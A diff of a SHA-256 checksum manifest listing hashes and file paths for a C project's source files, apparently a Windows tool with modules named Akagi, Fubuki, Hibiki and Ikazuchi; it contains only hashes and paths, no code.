-9754f1d2195c6d2ef6a228677d1a8fb8e92318aece0c389b3f28a87eeffe9827 *Source\Akagi\methods\pitou.h
+7bb57943b4abbe72996ae58d622b62717d9378a2f97be0c115ad6fc76af87285 *Source\Akagi\methods\hybrids.c
+858ce14e3179d817220aeda054750371723c2d72e9a59a30f17a2600c38511f3 *Source\Akagi\methods\hybrids.h
+effd49a0f695a763302c42dc192647c84712670d5af96ec54c83f09aebb39583 *Source\Akagi\methods\methods.c
+ac72b99dd5d456d1a349b23a78a3b5aa99e1a855a08d0689858f451d4af0069b *Source\Akagi\methods\methods.h
+4b9ef8073d1e9ad80050a74d53c7c4f11cfed18c6252faf49b2ea00502415a1b *Source\Akagi\methods\pitou.c
+9faab51fb7a0614dcf285ea02b468aee1edb50bb00b9dda8da20260d7460d255 *Source\Akagi\methods\pitou.h
3dd668663873b0e7816a2d2e89fb53ae2a418b1338b6530a9e3a1743e8bbd3fd *Source\Akagi\methods\sandworm.c
a38afbbd8ff528662d4f61ea1f688f44778f524d18dcc08badbd182b6537d7a5 *Source\Akagi\methods\sandworm.h
629be7ba979bcf0133b6a222ac358d7c9f3b4fe2f341d284a969b1a279b7dc0e *Source\Akagi\methods\simda.c
3c3a6eb8ee56ccffedd490e87b8a2fdec7e4b09bdb2650d231f2805a27e56ade *Source\Akagi\methods\simda.h
8d95d0c5a788964202100208749ab9744180f0ea36fa222a4a3adc1d0e3f90a1 *Source\Akagi\methods\sirefef.h
-813c594498f7f79e160f0775a6886fff179e43416e7aa79709bd779ffde9e582 *Source\Akagi\methods\tyranid.c
+0f497dd2915f834f86e0185f369c114f1013475877a7087aa0873a8155d2096f *Source\Akagi\methods\tyranid.c
233335679cbdb8023211a848051420a7e9a02b72c0af89ff0e5eb19fc018edb4 *Source\Akagi\methods\tyranid.h
-7266faf9d86af33e32023964bb666bb5fb5288586a38992f020796b75c0e9b15 *Source\Akagi\tests\test.c
+508459d7352df2b65d5b5a34b14f28a3c8e5c899ee881f4f8b862b843c197247 *Source\Akagi\methods\wusa.c
+711a7d727b1ce6003348ea9e4a909bc7c6b1711fb352fe42b947c7f75003ca52 *Source\Akagi\methods\wusa.h
+2bd9ea60ba513fedcfe5e2c98b6c78ebde7ac126ac4c9d6b4f40f6d771a6a420 *Source\Akagi\tests\test.c
b073f6d614bcdc345db660edf36784d1587e3f3ab309bfb871a0ce510faa57a6 *Source\Akagi\tests\test.h
09bd7cf61a0e2bf4474e8a11f88ba61f62fe26138acabc7bac71d336232285fc *Source\Akatsuki\akatsuki.suppress
588fbc961ae8c731d7617bda839ad326cc2f92d6f468cd6de475b4c21bd03a29 *Source\Akatsuki\Akatsuki.vcxproj
060c80fea1ef21d705757ddf9c19b586a7bb17356a356d57358db8143371fe17 *Source\Akatsuki\Akatsuki.vcxproj.filters
9a4b0023e443b33d85280eedb510864c42b4146c8e6e5f742444b3eff0aae55f *Source\Akatsuki\Akatsuki.vcxproj.user
-bfc16caf50161dcfbb51d148b66846def870d3856045a818c0965a5984113927 *Source\Akatsuki\dllmain.c
+e7722dff186b29d725cd56c476ab0a0439454de81ed5f905804b3a335894ba07 *Source\Akatsuki\dllmain.c
e10acf379efd906f8bf06a28e3b0b5598618c109c8a30f43e831b42f6aaf1950 *Source\Akatsuki\export.def
4006ba7005ca2873a5acbd2755ba1965e62bf0bd8783882f874bea2c80d45e1d *Source\Akatsuki\resource.h
-9977423977c6294586e91f57334ff22d53860f96a3d3df7adcd31881d78ea98b *Source\Akatsuki\version.rc
+7c519388501db074be74bf1a90119eff6193e0085081ea780cdf34a1114f54ee *Source\Akatsuki\version.rc
3f0f2bd8d770b9a92b4a5a05a621987a04ff67c79fba0264208c2cfae2eefc05 *Source\Fubuki\dll.suppress
-c391874c4c88a796f1e43dab5c049c69f5b80188511c437a234325db8320febd *Source\Fubuki\dll.vcxproj
-2b7c4bfaae209067f3e6b6e2695bd4e101075b0629c062c9c51f2c6546252c62 *Source\Fubuki\dll.vcxproj.filters
+5a69f0cae65a683c92fb0cd3139c7544ddb5d48be14e947d6b206c925e7525e3 *Source\Fubuki\dll.vcxproj
+cf19572228a04f2564f245b69ef8e0693cea38161b2e088fd3a2d254955cdd55 *Source\Fubuki\dll.vcxproj.filters
cb5688faa7cfe99a609ecdb7131f218628dbe34b8fb39ba83a2328227bc63179 *Source\Fubuki\dll.vcxproj.user
-66cc0ce3fa6ffb15e314355328cacab9b75a7b0bcab226de0a1b4d74041bfd81 *Source\Fubuki\dllmain.c
+8ca04d5e27c6470bd1d531b508cc3ca824b79552ab1ff580810b357eee3e82ed *Source\Fubuki\dllmain.c
938d2ffe637631e182f1b8e8ebfb642aee1bc854a689b489bf1d9b30335ab5e0 *Source\Fubuki\export.def
4006ba7005ca2873a5acbd2755ba1965e62bf0bd8783882f874bea2c80d45e1d *Source\Fubuki\resource.h
a2b59d06ad6f6af9ac19b5b15c987c246eb059eade447b63c3113646c6ef52a0 *Source\Fubuki\unbcl.h
-1d5b354a2f9225c3e410b3fc43bf8e9984de8fff8221c9f532483d22e54ab42f *Source\Fubuki\version.rc
+dacce5219ceec64ceff5491ed45dfe2ffe7c095fcb30b74db177e3d1541bf839 *Source\Fubuki\version.rc
eccff5e3d98818d8ea5393d86379985c8eee5b0ac44d06e1c8b52b29d96cf066 *Source\Fubuki\wbemcomn.h
-039659963ca2e567fe2a2c074c068a5b6ae11ce6664f319f10755f6ea4ff681b *Source\Hibiki\dllmain.c
+1e520be61368b89979d0c5605a62c71d1965c9bcbc0b4b18d070203e21913062 *Source\Hibiki\dllmain.c
fc32b236825eaad7806a7cbed561f751496deace5cc0a3b72856d934c879a31a *Source\Hibiki\hibiki.suppress
1df0cd6cef001334dbe6877d8a68d34089f6a0f11dcebc7f1d08d3835d50cd8b *Source\Hibiki\Hibiki.vcxproj
eaf764a71dca55552f81e54f864acf78bb081b8d42de8cfcf67c69347a297809 *Source\Hibiki\Hibiki.vcxproj.filters
cb5688faa7cfe99a609ecdb7131f218628dbe34b8fb39ba83a2328227bc63179 *Source\Hibiki\Hibiki.vcxproj.user
4006ba7005ca2873a5acbd2755ba1965e62bf0bd8783882f874bea2c80d45e1d *Source\Hibiki\resource.h
-a40b4cd99474e949a1e2fd0621a45eb7431761ee62f814e8a640ada57371eeac *Source\Hibiki\version.rc
-f1fddf038d62c308e7a6162e5f1d95d92d6479f00ec2bc3643d1edc500c9620a *Source\Ikazuchi\dllmain.c
+1fc3ee88bb60ffc54b1f33429125a30a09a829547a446a86e356f9cca1c7127d *Source\Hibiki\version.rc
+eb90b7b4ac53cd6f62deeb8f7028d5fecbfa3c6f03e3ad7e1c235918fbfed52e *Source\Ikazuchi\dllmain.c
14e64356e031e0c1d161f38d4ba8f1e6d55d6ea383c1b967123db80da2f172c2 *Source\Ikazuchi\export.def
c6357613fa00417abeb97834822a0d9a01b8f95d19a3e7358e00cfef88f7598e *Source\Ikazuchi\ikazuchi.suppress
706e38718d616247c8e9a0c6b6a51b5477ca6169c7126b6e26a33d99560fdc50 *Source\Ikazuchi\Ikazuchi.vcxproj
d196af9df08cbdaff3817f0e56bb356ae21e1dcbc6853482f14fd555e98aebb2 *Source\Ikazuchi\Ikazuchi.vcxproj.filters
9a4b0023e443b33d85280eedb510864c42b4146c8e6e5f742444b3eff0aae55f *Source\Ikazuchi\Ikazuchi.vcxproj.user
4006ba7005ca2873a5acbd2755ba1965e62bf0bd8783882f874bea2c80d45e1d *Source\Ikazuchi\resource.h
-0b23b7f61f21bda96f1515711852f3b9a981efb09623c6d7ed743f81d4a0cf9e *Source\Ikazuchi\version.rc
+8ed990126df328775e139b55ab5f192c80e7527aa45f8e5b22bf6517d239940f *Source\Ikazuchi\version.rc
82868f43880065610efe2dc0532876384b3f04d57a17a6f95d5fd71784cfa2db *Source\Inazuma\Inazuma.vcxproj
0cd995b29fdec206817ef1939ac1b9c1a10bc87fff80490f030097a8a0e07c49 *Source\Inazuma\Inazuma.vcxproj.filters
cb5688faa7cfe99a609ecdb7131f218628dbe34b8fb39ba83a2328227bc63179 *Source\Inazuma\Inazuma.vcxproj.user
@@ -113,7 +117,7 @@ bd6fe82852c4fcdfab559defa33ea394b752a4e4a5ac0653ae20c4a94b0175ed *Source\Shared\
01c5aada277c3a7a138ab7c31beda0decee8ec28fe7525e43ca524b2b0270213 *Source\Shared\ldr.c
b22c6d2722fa9e917746502fd4615d28b9c889d7288fc737315150e0ae40ee6f *Source\Shared\ldr.h
107245437ed86b6f1e839b2d3d9bbadb3d9980046cb5c7001f985fed3627962f *Source\Shared\minirtl.h
-5d1e45dfb65548af3fa7e13792d4cca37ddbb8324e7ec1c21fd9a6d9ea49922f *Source\Shared\ntos.h
+7d7466f9b0f9a1264f8c606e7171b109927507444d04b02c6ae42c755d5e0c00 *Source\Shared\ntos.h
3fccfae61f8e59435c180be88cb46967361ed61ec1314532dddabf12679902b1 *Source\Shared\ntsxs.h
b9de99d3447bb1a125cb92aa1b3f9b56a59522436f1a1a97f23aac9cee90341c *Source\Shared\rtltypes.h
ca0b7a38be2f3f63a69aca6da7b3a62a59fcefee92de00e9796f68d4a2a23158 *Source\Shared\strtoi.c